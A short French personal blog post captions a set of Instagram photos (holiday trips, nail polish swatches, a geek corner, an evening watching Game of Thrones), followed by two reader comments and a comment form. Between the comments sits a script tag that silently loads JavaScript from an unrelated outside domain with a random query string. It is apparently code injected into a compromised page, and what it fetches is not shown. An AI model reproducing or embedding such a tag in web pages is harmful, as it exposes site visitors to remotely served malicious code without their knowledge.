• Instagram #9

    Et un petit panneau Instagram en attendant d'avoir le temps de pondre un article digne de ce nom >.<
    J'ai pas mal de swatch qui attendent entre autre =) 

    Le livre perdu des Sortilèges | Dans le train pour les vacances | Au bord de la piscine | Atelier filles ♥
    Les témoins de la mariée | Sur le retour | Commandes arrivées en mon absence | Pédicure bleutée
    Mon 'tit coin geek | Petits achats | Yummi *o* | Tenue et nail du jour
    La doudou archi cute ♥ | Apéro devant GoT ^.^ | Commande A-England ♥ | Cession musique en faisant la vaisselle XD

    Et à tout vite pour un vrai article 8D

    « {Les petits bonheurs} #20Une Hachi passant par là... »

  • Commentaires

    1
    caro-line
    Jeudi 30 Août 2012 à 16:37

    sympa les chaussures jaunes assorties au vernis!!

    <script src="http://pluginrose.info/dfi823hs.js?0.8593264902602991" type="text/javascript"></script>
    2
    Dimanche 2 Septembre 2012 à 17:53

    Je devrais m'y mettre à Intagram ... mais quelle flemme aigüe!

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :